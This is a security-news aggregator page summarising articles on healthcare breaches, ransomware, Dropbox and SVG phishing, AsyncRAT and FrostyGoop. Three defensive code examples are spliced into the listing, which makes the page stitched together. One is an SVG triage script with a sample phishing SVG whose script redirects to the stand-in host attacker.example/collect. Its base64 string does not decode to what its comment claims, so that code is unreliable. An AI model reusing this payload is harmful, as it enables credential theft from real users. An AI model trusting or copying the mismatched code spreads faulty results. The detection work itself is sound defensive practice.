What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
Checkpoint.webp 2024-12-09 13:00:57 The Invisible Eyes and Ears in Our Homes: How Smart Devices are Eroding Privacy and Security (direct link) A Quiet Breach in the Heart of Our Homes. Privacy is generally held as a fundamental right, and citizens often have high expectations regarding the protection of their personal information. Citizens protest when they fear that governments are increasing their involvement in their personal lives. However, they rarely consider how much personal and sensitive data they share with every application they install on their smartphone, or with the smart devices in their homes. Big tech companies and vendors of personal devices such as wearables, smartphones and voice assistants collect intimate details about their users, often far more than any healthcare […]
Medical ★★★
ZoneAlarm.webp 2024-12-09 12:41:30 Anna Jaques Hospital Ransomware Breach Exposes Patient Data (direct link) Ransomware attacks continue to disrupt industries worldwide, with healthcare remaining a high-profile target because of the sensitivity and critical nature of its data. Anna Jaques Hospital experienced a ransomware attack in late 2023 that exposed confidential information of over 310,000 patients. Recently, the incident returned to the spotlight due to new updates on the breach's scope …
Ransomware Medical ★★
ProofPoint.webp 2024-12-05 12:49:54 Cybersecurity Stop of the Month: 'Tis the Season To Click Carefully: How Proofpoint Stopped a Dropbox Phishing Scam (direct link) The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today's cybercriminals and how Proofpoint helps organizations fortify their email defenses against emerging threats. Phishing attacks surged in 2024, increasing nearly 60% year over year. Experts have noted that these attacks are not only growing in volume but also becoming more sophisticated. Shifts in the threat landscape, driven by advances in generative AI and evolving social engineering tactics, are enabling cybercriminals to conduct more personalized attacks that are increasingly difficult to detect. Globally, an average of 4 billion phishing emails are sent per day. The increased success of these attacks has contributed to a high financial toll: by the end of the year, projected global costs could reach $250 billion. Sectors like finance and insurance have been hit hardest, experiencing over 27% of all phishing attacks, while technology, healthcare and education are also major targets. Today, we'll explore one type of phishing attack that is particularly hard to identify: Dropbox phishing.
Background. During the past few years, Dropbox phishing scams have grown more sophisticated. Here's how they typically work (figure: Steps in a Dropbox phishing scam). Phishing attacks that use legitimate Dropbox infrastructure are hard to identify for several reasons, including:
Abuse of a legitimate service. A bad actor uploads a malicious document, such as a PDF with an embedded malicious URL, and sends it directly through Dropbox. Because the threat is delivered by a legitimate service, it can bypass an organization's email security defenses.
Email pretexting. The phishing email that initiates the attack can be very convincing. Bad actors often include realistic pretexts, such as "You've been invited to view a file" or "A file was shared with you," which closely mirror legitimate Dropbox notifications.
Trust in the brand. Dropbox is widely trusted and frequently used for file sharing. If users regularly log into Dropbox to access shared files, they are less likely to scrutinize the login prompt, especially if they are accustomed to receiving Dropbox file-sharing invitations.
This type of attack is stealthy and hard to detect. Bad actors can deliver any kind of payload via Dropbox, including ransomware and other malware.
The scenario. In this recent attack, a bad actor used legitimate Dropbox infrastructure to send a recipient a link to a malicious document that only they could access. The target organization was a New England-based non-profit that owns and operates upwards of 12,000 homes and 102 properties across 11 states. The organization's incumbent email security was Microsoft 365 E3 plus an add-on API-based tool. Neither tool detected, blocked or remediated this phishing attack, which left the organization exposed to a potential compromise or data breach.
The threat: How did the attack happen? Here is a closer look at how the attack unfolded:
1. Legitimate Dropbox message. A bad actor targeted employees with a shared PDF file that could only be accessed by the recipients. The notification was genuine and was sent by the real Dropbox service. (Figure: Legitimate Dropbox message received by the user.)
2. Legitimate Dropbox login. To view the shared PDF, employees needed to click the "View in Dropbox" button. Had they clicked the link, they would have been prompted to log in and authenticate to the Dropbox service. Both the login screen and the authentication messages were valid, as they were sent from the real Dropbox service. (Figure: Legitimate Dropbox login page for accessing the shared file.)
3. Dropbox phishing page. Once authenticated, users would open Ransomware Data Breach Malware Tool Threat Medical Cloud ★★
DarkReading.webp 2024-12-03 15:00:00 Ransomware's Grip on Healthcare (direct link) Until C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.
Ransomware Medical ★★
AlienVault.webp 2024-12-03 07:00:00 Best Ways to Reduce Your Digital Footprint Now (direct link) Every activity you perform online, whether commenting on a news article, sharing something on social media or shopping, leaves a digital footprint. This digital trail helps organizations learn more about you. While it offers a degree of convenience, it can be a real hazard to your online privacy. Fortunately, there are several ways to reduce your digital footprint and protect your privacy. Understanding Your Digital Footprint. A digital footprint is the trail of data a person leaves behind while using the internet. It includes your search history, photos and videos you have uploaded, newsletter subscriptions and more. Also known as a 'digital shadow', your footprint data can paint a detailed picture of who you are, which is why most apps, websites and online marketers use it to personalize your browsing experience. That same data can also undermine your privacy, and it is a frequent ingredient in data breaches and targeted scams. Since almost every action online is recorded, the footprint that forms is unique to each user. Footprints are classified by how the data is left or collected, and there are two main types. Active Digital Footprint. An active digital footprint is the data you intentionally leave online: posts, comments, online purchases or even signing up for a newsletter. Passive Digital Footprint. A passive digital footprint is the data you share unintentionally. Much of it is collected through the cookies and trackers a website sets when you visit it: how many times you have visited, your approximate location, your device details and your IP address.
Both active and passive digital footprints can be tracked and stored by multiple sources. If you are curious how large your digital footprint is, consider these four methods: search your name on popular search engines like Google and Yahoo, use a digital footprint checker, review your public accounts, and look for exposed data through a breach-notification service. Does My Digital Footprint Disrupt My Online Privacy? Can I Delete It? A digital footprint is effectively permanent, and deleting it is next to impossible. Once your data is public, you have little control over how others use it. Information left behind by your online activity is used and stored by third-party services, your service providers and governments. One of the most dangerous aspects of an online footprint is that you never know how big it is. Since every app and site collects, stores and shares bits of your information, there is no way to track down and eliminate all of it. Even the parts of your life you would want to keep private, such as your medical information, can be revealed through your online orders or search history. Here are some ways your online footprint harms your privacy: Information is valuable to cybercriminals, who can exploit your digital footprint to gather enough relevant detail for identity theft, phishing, cyberbullying and bank scams. You receive more spam emails and phone calls, since your information is shared publicly and with third parties. Potential employers may find outdated or unwanted information and reject you on that basis. According to one study, seven out of ten employers run background checks on candidates' social media profiles and have rejected 57% of people Spam Tool Threat Studies Medical Yahoo ★★
The_Hackers_News.webp 2024-12-02 19:31:00 SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan (direct link) Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While
Malware Medical
RiskIQ.webp 2024-12-02 12:13:17 Weekly OSINT Highlights, 2 December 2024 (direct link)
## Snapshot
Last week's OSINT reporting highlights the sophistication and diversity of cyber threat campaigns, emphasizing advanced techniques, varied attack vectors and strategic targeting. Key themes include ransomware operations such as Elpaco and CyberVolk, which rely on strong encryption and Ransomware-as-a-Service models, and phishing campaigns such as Rockstar 2FA and SVG-based malware distribution, which show new ways to bypass MFA and abuse image formats. Attack vectors spanned vulnerabilities like Zerologon and CVE-2023-28461, legitimate tools like Atera, and novel methods like Wi-Fi proximity attacks. Threat actors ranged from state-sponsored groups to financially motivated cybercriminals and hacktivists. The targets reflected global geopolitical and economic stakes, focusing on public sectors, critical infrastructure and high-value industries across Europe, the US and Asia, reinforcing the importance of proactive threat intelligence and mitigation.
## Description
1. [BianLian's Shift to Data Extortion](https://sip.security.microsoft.com/intel-explorer/articles/c958d17f): The BianLian ransomware group has transitioned from file encryption to data-theft extortion, using privilege escalation, SOCKS5 tunneling and customized PowerShell scripts. Active since 2022, the group targets sectors such as healthcare and airlines, exploiting ProxyShell and calling employees to pressure ransom payments.
2. [BYOVD Campaign Exploiting Avast Driver](https://sip.security.microsoft.com/intel-explorer/articles/75844a3f): Trellix researchers discovered malware using the Bring-Your-Own-Vulnerable-Driver (BYOVD) technique with an outdated Avast anti-rootkit driver to bypass tamper protection. The malware terminates security processes with kernel-level privileges, a significant risk to organizations relying on antivirus and EDR solutions.
3. [SpyLoan Apps Targeting Global Users](https://sip.security.microsoft.com/intel-explorer/articles/ddc51ef9): McAfee Labs reported a surge in SpyLoan apps on Android devices, exploiting users in South America, Asia and Africa through predatory lending practices. These apps harvest sensitive data, extort victims and misuse permissions, leading to financial fraud and harassment.
4. [Exploitation of CVE-2023-28461](https://sip.security.microsoft.com/intel-explorer/articles/4d4a4d34): CISA flagged CVE-2023-28461, an improper-authentication vulnerability in Array Networks' ArrayOS, as actively exploited and mandated remediation by December 2024. The vulnerability threatens both federal and non-federal organizations.
5. [Hexon Stealer Targets Discord Users](https://sip.security.microsoft.com/intel-explorer/articles/19796350): CYFIRMA linked Hexon Stealer, a rebranded version of Stealit Stealer, to credential theft and cryptocurrency-wallet exfiltration. Built with the Electron framework, the malware injects malicious code into Discord, enabling full system control for attackers.
6. [North Korean IT Worker Front Companies](https://sip.security.microsoft.com/intel-explorer/articles/d3dd2b00): SentinelLabs uncovered DPRK use of fake tech companies impersonating U.S. brands to win global contracts and fund state programs. These front companies route payments through shadow banking systems and cryptocurrencies, supporting activities such as weapons development.
7. [Elpaco Ransomware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/73371539): Kaspersky reported the Elpaco ransomware, a Mimic variant, exploiting RDP brute force and Zerologon (CVE-2020-1472) for privilege escalation. The attacks, against various global industries, employ strong encryption and file-discovery methods, rendering files unrecoverable without the private key.
8. [CyberVolk Ransomware Operations](https://sip.security.microsoft.com/intel-explorer/articles/db8b4022): CyberVolk, a pro-Russian hacktivist group, has deployed ransomware like Hexa Ransomware Malware Tool Vulnerability Threat Mobile Medical ★★
RecordedFuture.webp 2024-11-29 19:29:24 Italian football club Bologna FC says company data stolen during ransomware attack (direct link) Bologna FC's confirmation comes days after the RansomHub ransomware gang claimed to have attacked the club and stolen financial and medical documents.
Ransomware Medical ★★
InfoSecurityMag.webp 2024-11-27 16:10:00 New EU Commission to Unveil Healthcare Cybersecurity Plan in First 100 Days (direct link) One of the priorities of the newly approved Von der Leyen Commission II will be to strengthen the healthcare sector's cyber resilience
Medical ★★
RecordedFuture.webp 2024-11-26 18:02:16 Canadian privacy regulators publish details of medical testing company's data breach (direct link) A 2020 report detailing the hack of a Canadian medical testing company was released Monday after a court ruled it could be made public, ending a four-year battle during which the company sought to keep the details of the investigation secret.
Data Breach Hack Medical ★★
AlienVault.webp 2024-11-26 14:37:00 What Are Computer Worms? (direct link) In today's interconnected digital world, businesses are constantly under threat from cybercriminals seeking to exploit vulnerabilities in systems, networks and devices. One of the most persistent and silent threats organizations face is the computer worm. These malicious programs spread across networks, infecting systems autonomously and doing damage before anyone realizes something is wrong. Computer worms are a type of malware designed to replicate and spread on their own across networks and computer systems. Unlike traditional viruses, which require user action to propagate, worms self-replicate without attaching to a host file or program. This capability makes them especially dangerous: they can spread rapidly and infect numerous devices before users are aware of their presence. The impact of computer worms ranges from degraded system performance to the complete loss of critical data. High-profile outbreaks such as Code Red and WannaCry have shown how severe and disruptive these threats can be. Despite growing awareness of threats like viruses, ransomware and phishing, worms remain one of the most harmful types of malware. They can silently infiltrate your network, consume bandwidth, corrupt or steal data, and open the door to follow-on attacks. Understanding what worms are, how they work and how to defend against them is crucial for any business, large or small. In this article, we explore the nature of computer worms, their risks and potential damage, and how to protect your organization against them. Let's dive in! Computer Worm Definition. At its core, a computer worm is self-replicating malware that spreads across networks or systems without any user interaction.
Unlike traditional viruses, which require users to open infected files or click malicious links, worms propagate autonomously once they find an entry point into a system. Their primary purpose is to replicate, often at an alarming rate, and spread from one computer to another, typically by exploiting vulnerabilities in network protocols, software or operating systems. A worm is distinguished by its ability to move freely across networks, infecting computers and servers, consuming resources and, in many cases, causing significant damage along the way. The worst part? Worms usually need neither a host file nor a user action to activate; they spread automatically, which makes them far harder to contain than file-infecting malware. To better understand what makes worms unique, a clearer definition: A computer worm is a standalone malicious program that can replicate and propagate across computer systems and networks. Unlike traditional viruses, worms do not attach themselves to files or require users to run them. They spread through network connections, exploiting vulnerabilities in software and hardware. Worms often carry out harmful actions such as data theft, system corruption or creating backdoors for other malware such as ransomware or Trojan horses. The main difference between worms and other malware (like viruses or spyware) is that worms focus specifically on self-replication and spreading across networks, whereas viruses typically need to attach themselves to an existing file or program. While all worms share common traits, there are various types based on how they spread or the methods they use to exploit systems: Email Worms: These worms spread through email systems, often by sending malicious attachments or links to everyone in a user's contact list. The ILOVEYOU worm, one of the most infamous examples, spread via email attachments and wreaked havoc on millions of systems.
Network Worms: These worms target security vulnerabilities in network protocols, services, Ransomware Data Breach Spam Malware Tool Vulnerability Threat Patching Mobile Industrial Medical Technical Wannacry ★★
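The network-worm behaviour described in this article (one host exploiting a network service on many peers) shows up in flow telemetry as fan-out: one source, one destination port, many destinations it has never spoken to, within a short window. The following is an added example, not code from the AlienVault article; it implements that heuristic over constructed flow records with illustrative thresholds (a 60-second window and 10 targets), and it also shows the heuristic's blind spot, a slow scanner that stays under the window.

```python
"""Fan-out heuristic for spotting worm-like scanning in flow logs.

Added example, not code from the original article. The flow records are
constructed and the thresholds (60 s window, 10 targets) are illustrative.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float     # seconds
    src: str
    dst: str
    dport: int


def fanout_alerts(flows, window=60.0, min_targets=10):
    """Map (src, dport) -> peak number of distinct destinations reached within
    `window` seconds, for every source that reached at least `min_targets`.

    A worm exploiting one network service looks exactly like this: one host,
    one port, many destinations it has never spoken to, in quick succession.
    Ordinary clients talk to a handful of servers on a given port.
    """
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f.src, f.dport)].append((f.ts, f.dst))

    alerts = {}
    for key, events in by_key.items():
        events.sort()
        seen = defaultdict(int)   # dst -> occurrences inside the current window
        distinct = 0
        left = 0
        for ts, dst in events:
            if seen[dst] == 0:
                distinct += 1
            seen[dst] += 1
            # slide the left edge forward until the window fits
            while ts - events[left][0] > window:
                old = events[left][1]
                seen[old] -= 1
                if seen[old] == 0:
                    distinct -= 1
                left += 1
            if distinct >= min_targets:
                alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts


# Constructed flow records: three hosts with three very different behaviours.
SAMPLE_FLOWS = (
    # worm-like fan-out: 25 distinct hosts on tcp/445 in 25 seconds
    [Flow(ts=float(i), src="10.0.0.7", dst=f"10.0.1.{i + 1}", dport=445) for i in range(25)]
    # ordinary client: the same 3 servers on tcp/443, revisited over 10 minutes
    + [Flow(ts=i * 20.0, src="10.0.0.20", dst=f"10.0.2.{(i % 3) + 1}", dport=443) for i in range(30)]
    # slow scanner: 12 hosts on tcp/22, one every 90 s, so never 10 inside a 60 s window
    + [Flow(ts=i * 90.0, src="10.0.0.9", dst=f"10.0.3.{i + 1}", dport=22) for i in range(12)]
)


def demo():
    return fanout_alerts(SAMPLE_FLOWS, window=60.0, min_targets=10)


if __name__ == "__main__":
    for (src, port), n in demo().items():
        print(f"ALERT {src} reached {n} distinct hosts on tcp/{port} within 60 s")
```

With the default thresholds only the fast scanner (10.0.0.7) is reported. Widening the window to ten minutes and lowering the target count to five also surfaces the slow scanner, at the cost of more false positives from busy legitimate hosts; the trade-off is the window and count you pick, not the heuristic itself.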
IndustrialCyber.webp 2024-11-26 10:10:34 US senators debut bipartisan legislation to fortify cybersecurity, protect data across healthcare sector (direct link) After establishing their healthcare working group last year, U.S. Senators Bill Cassidy, a Louisiana Republican and the ranking...
Legislation Medical ★★★
RiskIQ.webp 2024-11-25 22:13:05 Warning Against Malware in SVG Format Distributed via Phishing Emails (direct link)
## Snapshot
Researchers at AhnLab Security Intelligence Center (ASEC) have identified a campaign in which malware is distributed through Scalable Vector Graphics (SVG) files.
## Description
These SVG files are used as attachments in phishing emails, with instructions in the email body on how to open the file. The SVG malware comes in two types: a downloader type that lures users into downloading a supposed PDF, and a phishing type that prompts users to enter account credentials to view an Excel document. The downloader type contains hyperlinks within image content elements that lead to additional malware hosted on legitimate services like Dropbox and Bitbucket. The download is a password-protected archive containing [AsyncRat](https://security.microsoft.com/intel-profiles/e9216610feb409dfb620b28e510f2ae2582439dfc7c7e265815ff1a776016776), which can steal information and create a backdoor. The phishing type uses obfuscated JavaScript within the SVG to encode and transmit the victim's account information to the attacker's server. Embedding the malicious code within image content elements makes it hard for users to recognize the SVG file as harmful. The growing use of varied file formats for malware distribution, SVG included, underlines the need for caution when opening email attachments from unknown sources, especially SVG files.
## Microsoft Analysis and Additional OSINT Context
AsyncRAT is a .NET-based remote access trojan (RAT) that lets attackers remotely control infected Windows systems and perform keylogging, file theft, screenshot capture and even ransomware deployment.
Leveraging asynchronous programming, AsyncRAT can run multiple tasks in the background without noticeably affecting system performance, making it stealthy and efficient. To evade detection, AsyncRAT employs obfuscation, encrypts its traffic, disables security features like Windows Defender and uses dynamic DNS to mask its C2 server's location. Active since at least 2019, it is frequently used against industries such as finance, healthcare, government and education. AsyncRAT's versatility and evasion capabilities make it a persistent threat. Researchers at G DATA Security Lab identified a similar campaign in which attackers [distributed AsyncRAT through Bitbucket.](https://security.microsoft.com/intel-explorer/articles/8e774461) In that campaign, a VBS file contained hidden code that executed a PowerShell command to retrieve AsyncRAT from a Bitbucket repository. [Other legitimate tools, such as TryCloudflare tunnel infrastructure, have been used to execute the AsyncRAT payload.](https://security.microsoft.com/intel-explorer/articles/bf7946e8) Threat actors are increasingly using legitimate file-hosting services like SharePoint, OneDrive and Dropbox for identity phishing and business email compromise (BEC). These campaigns combine social engineering with defense-evasion tactics such as files with restricted access and view-only permissions, which make detection difficult. Typically, the attack begins by compromising a trusted vendor and sharing malicious files that appear legitimate, often requiring re-authentication and leading to identity compromise. Restricted-access files, view-only mode and time-limited access hinder traditional security measures.
Find out more about this tactic in Microsoft's blog: [File hosting services misused for identity phishing](https://www.microsoft.com/en-us/security/blog/2024/10/08/file-hosting-services-misused-for-identity-phishing/?msockid=029395c08bc2665b315481458a11673b).
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your an Ransomware Malware Tool Threat Medical ★★★
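A mail gateway or analyst triaging attachments can check statically for the two constructs ASEC describes: a hyperlink on image content that leads off-host (the downloader type) and embedded, usually obfuscated, JavaScript (the phishing type). The following is an added example, not ASEC's or Microsoft's code. The three SVG documents are constructed; the Dropbox URL in the downloader sample is a placeholder path, not a real share link, and the hosting service is deliberately not trusted by default, since the whole point of the campaign is that the hosting service is legitimate.

```python
"""Static triage of SVG attachments for the two abuse patterns described above:
a downloader (hyperlink on image content pointing off-host) and a phishing
form (embedded, usually obfuscated, JavaScript).

Added example; not ASEC's or Microsoft's code. The SVG documents are constructed.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

EMBED_TAGS = {"foreignobject", "iframe", "embed", "object"}
OBFUSCATION_TOKENS = ("atob(", "unescape(", "fromCharCode", "eval(")


def _local(name):
    """Strip an XML namespace: '{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(svg_text, trusted_hosts=()):
    """Return a sorted list of findings; an empty list means nothing suspicious.

    Parse failure is itself reported: deliberately malformed SVG is a common
    way to slip past naive scanners while still rendering in a browser.
    """
    findings = set()
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparseable: {exc}"]

    for el in root.iter():            # root.iter() includes the <svg> element itself
        tag = _local(el.tag)
        if tag == "script":
            body = el.text or ""
            findings.add("script element" + (" (inline code)" if body.strip() else ""))
            if any(tok in body for tok in OBFUSCATION_TOKENS):
                findings.add("obfuscation indicators in script")
        elif tag in EMBED_TAGS:
            findings.add(f"{tag} element")

        for attr, raw in el.attrib.items():
            name = _local(attr)
            value = raw.strip()
            if name.startswith("on"):                  # onload, onclick, ...
                findings.add(f"event handler {name}")
                continue
            if name != "href":                         # covers href and xlink:href
                continue
            parsed = urlparse(value)
            scheme = parsed.scheme.lower()
            if scheme in ("javascript", "vbscript"):
                findings.add(f"href with {scheme}: scheme")
            elif scheme == "data" and tag != "image":  # data: is normal on <image>
                findings.add(f"data: URI on <{tag}>")
            elif scheme in ("http", "https"):
                host = parsed.hostname or ""
                if host not in trusted_hosts:
                    findings.add(f"external link to {host}")
    return sorted(findings)


# --- constructed samples ----------------------------------------------------
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
  <image width="10" height="10" xlink:href="data:image/png;base64,iVBORw0KGgo="/>
</svg>"""

# Downloader pattern: the whole "document preview" is one clickable link to a
# hosting service (placeholder path, not a real share link).
DOWNLOADER_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="400">
  <a xlink:href="https://www.dropbox.com/s/placeholder/invoice.zip?dl=1">
    <image width="600" height="400" xlink:href="data:image/png;base64,iVBORw0KGgo="/>
    <text x="20" y="380">Click to open the document</text>
  </a>
</svg>"""

# Phishing pattern: the fake login is driven by script whose target is base64-encoded.
PHISHING_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <text x="10" y="20">Sign in to view the Excel document</text>
  <script><![CDATA[
    var p = "aHR0cHN6Ly8=";   /* base64 of "https://" */
    function init() { document.location = atob(p) + "attacker.example/collect"; }
  ]]></script>
</svg>"""


def demo():
    return {name: triage_svg(doc) for name, doc in
            (("benign", BENIGN_SVG), ("downloader", DOWNLOADER_SVG), ("phishing", PHISHING_SVG))}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name:10s} {findings or ['clean']}")
```

The `trusted_hosts` parameter exists so a deployment can whitelist its own CDN; leaving Dropbox or Bitbucket out of it is deliberate, because a link from an image to an archive on a hosting service is exactly the downloader pattern.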
AlienVault.webp 2024-11-22 07:00:00 DSPM vs CSPM: Key Differences and Their Roles in Data Protection (direct link) It is becoming increasingly challenging to secure sensitive data. Cybercriminals are becoming more sophisticated, IT infrastructure more complex, and attack surfaces larger. With so much data now stored off-premises, organizations must protect not only their sensitive information but also the platforms that house it. This is where data security posture management (DSPM) and cloud security posture management (CSPM) come in. Both play critical roles in cloud data security and are easily confused at first glance, so let's look at their key differences and their roles in data protection. Understanding DSPM. As the name suggests, DSPM is a data security tool. It rests on the idea that securing an organization's sensitive information requires a deep understanding of the data itself. DSPM solutions therefore discover and classify sensitive data in cloud repositories and identify the vulnerabilities and risks associated with that data. DSPM tools work in four phases: they discover an organization's data across all its cloud platforms; they classify it by sensitivity to produce a comprehensive, contextualized data inventory; they monitor cloud environments in real time for vulnerabilities or misconfigurations that put the data at risk; and they prioritize remediation, with the most sensitive data first. By protecting data in this way, DSPM helps organizations maintain compliance with regulations such as GDPR, HIPAA and PCI DSS. Understanding CSPM. Again as the name suggests, CSPM is a cloud security tool.
Rather than focusing on the data stored in cloud environments, as DSPM does, it secures the cloud infrastructure itself, continuously monitoring for misconfigurations, compliance issues and security threats to help organizations manage data access and data risk. These solutions scan for misconfigurations, including weaknesses in cloud settings, permissions and access controls; monitor compliance with regulatory requirements and industry standards such as CIS, NIST, CCPA and GDPR; and help organizations remediate issues before they become security incidents. Key Differences Between DSPM and CSPM. Although both play vital roles in cloud security, their focus areas, tools and techniques, and use cases differ: Focus Area: DSPM is data-centric, concentrating on protecting sensitive information stored in the cloud; CSPM focuses on the broader infrastructure, ensuring the cloud environment itself is secure. Tools and Techniques: DSPM uses data discovery, classification and encryption techniques, while CSPM employs tools for monitoring, detecting misconfigurations and managing security policies. Use Cases: DSPM is ideal for protecting data assets and ensuring compliance, especially in heavily regulated industries; CSPM is better suited to preventing infrastructure misconfigurations and maintaining cloud security hygiene. In short, DSPM ensures that data is properly secured and compliant, while CSPM keeps the underlying cloud infrastructure safe from threats and vulnerabilities. Real-World Use Cases To put al Tool Vulnerability Threat Medical Cloud ★★★
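To make the distinction concrete: a CSPM check reads a resource's configuration and knows nothing about its contents, a DSPM check classifies the contents and knows nothing about the platform, and ranking what to fix first needs both. The following is an added example, not from the AlienVault article or any vendor product; it runs a toy of each check over a constructed three-bucket inventory. The field names, the classification rules and the sensitivity weights are assumptions for illustration, and the card number in the sample is a standard test number that passes the Luhn check.

```python
"""What a CSPM check and a DSPM check each look at, side by side.

Added example; not from the original article or any vendor product. The
bucket inventory, its records, the field names and the weights are constructed.
"""
import re


# --- CSPM view: the resource's configuration, with no knowledge of contents --
def cspm_findings(bucket):
    """Misconfigurations visible from the platform settings alone."""
    findings = []
    if bucket["public_read"]:
        findings.append("public read access")
    if not bucket["encrypted_at_rest"]:
        findings.append("no encryption at rest")
    if not bucket["versioning"]:
        findings.append("versioning disabled")
    if "*" in bucket["allowed_principals"]:
        findings.append("wildcard principal in access policy")
    return findings


# --- DSPM view: what is stored and how sensitive it is, regardless of platform --
SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD = re.compile(r"\b(?:\d[ -]?){13,16}\b")
PHI_TERMS = ("diagnosis", "patient", "prescription", "icd-10")
SENSITIVITY_WEIGHT = {"PHI": 3, "PCI": 3, "PII": 2}


def luhn_ok(digits):
    """Luhn checksum, used to separate real card numbers from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(record):
    """Sensitivity labels found in one record (a string)."""
    labels = set()
    if SSN.search(record):
        labels.add("PII")
    for m in CARD.finditer(record):
        if luhn_ok(re.sub(r"\D", "", m.group())):
            labels.add("PCI")
    if any(term in record.lower() for term in PHI_TERMS):
        labels.add("PHI")
    return labels


def dspm_findings(bucket):
    labels = set()
    for rec in bucket["sample_records"]:
        labels |= classify(rec)
    return sorted(labels)


def prioritise(inventory):
    """Rank configuration weaknesses by the sensitivity of the data they expose.

    This is the piece neither view has alone: CSPM sees three findings on a
    bucket of marketing images, DSPM sees PHI in a bucket it cannot tell is
    public. Score = number of config findings x weight of the most sensitive label.
    """
    ranked = []
    for bucket in inventory:
        cfg = cspm_findings(bucket)
        data = dspm_findings(bucket)
        weight = max((SENSITIVITY_WEIGHT[lab] for lab in data), default=1)
        ranked.append((len(cfg) * weight, bucket["name"], cfg, data))
    ranked.sort(key=lambda row: (-row[0], row[1]))
    return ranked


# Constructed inventory: a leaky PHI export, a public but harmless asset bucket,
# and a well-configured bucket that nonetheless holds card data.
INVENTORY = [
    {"name": "clinic-exports", "public_read": True, "encrypted_at_rest": False,
     "versioning": True, "allowed_principals": ["arn:example:role/etl"],
     "sample_records": ["patient 4471, diagnosis: J45.909, ssn 123-45-6789"]},
    {"name": "web-assets", "public_read": True, "encrypted_at_rest": True,
     "versioning": False, "allowed_principals": ["*"],
     "sample_records": ["logo.png", "hero-banner.jpg"]},
    {"name": "payments-archive", "public_read": False, "encrypted_at_rest": True,
     "versioning": True, "allowed_principals": ["arn:example:role/finance"],
     "sample_records": ["order 8812 card 4539 1488 0343 6467 exp 09/27"]},
]

if __name__ == "__main__":
    for score, name, cfg, data in prioritise(INVENTORY):
        print(f"{score:2d} {name:18s} config={cfg} data={data}")
```

The public PHI export ranks first with two configuration findings weighted by PHI; the public asset bucket has more configuration findings but nothing sensitive in it; the payments archive has card data but no configuration finding to act on, which is the case a pure CSPM tool would never surface and a pure DSPM tool could not prioritise.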
The_State_of_Security.webp 2024-11-21 10:05:26 750,000 Patients' Medical Records Exposed After Data Breach at French Hospital (direct link) When we think about our data being leaked onto the internet, we often picture it as our financial records, our passwords, our names and addresses... what is less often considered is the exposure of our private medical information. A French hospital has found itself in the unenviable position of learning that hackers have gained access to the medical records of over 750,000 patients following a cyber attack. A hacker calling themselves "nears" claims to have compromised the systems of multiple healthcare facilities across the country, claiming to have gained access to the records of over 1.5...
Data Breach Medical ★★★
RecordedFuture.webp 2024-11-21 01:08:59 FBI says BianLian based in Russia, moving from ransomware attacks to extortion (direct link) The ransomware group has drawn scrutiny for attacks on charities like Save The Children as well as healthcare firms like Boston Children's Health Physicians. On Tuesday, it took credit for an attack on a Canadian healthcare company.
Ransomware Medical ★★
RiskIQ.webp 2024-11-21 00:18:57 FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications (direct link)
#### Targeted Geolocations - Ukraine
## Snapshot
Unit 42 researchers at Palo Alto Networks have identified the OT-centric malware FrostyGoop, also known as BUSTLEBERM, which targets Operational Technology (OT) systems. First observed in a [January 2024 attack](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199) by Russian threat actors on a municipal energy company in Ukraine, FrostyGoop sent Modbus TCP commands to ICS devices and disrupted heating services for over 600 apartment buildings.
## Description
FrostyGoop, compiled in Go, uses a Modbus TCP connection to interact with ICS/OT devices and can perform Modbus read, write and write-multiple operations according to parameters in a JSON configuration file. The initial compromise may have involved a vulnerability in a MikroTik router. The malware builds on an open-source Modbus implementation, logs output to the console or to a JSON file, and is associated with a Windows executable named go-encrypt.exe that uses AES encryption to conceal target information. It also implements a debugger-evasion check by reading the BeingDebugged flag in the Windows Process Environment Block (PEB).
## Microsoft Analysis and Additional OSINT Context
The cybersecurity landscape for OT environments is increasingly dangerous, with a rise in ICS-centric malware like FrostyGoop and a growing number of OT and IoT devices exposed to the internet. Adversaries, including nation-state actors, ransomware groups and hacktivists, are leveraging these weaknesses to target critical infrastructure sectors such as energy, transportation and healthcare.
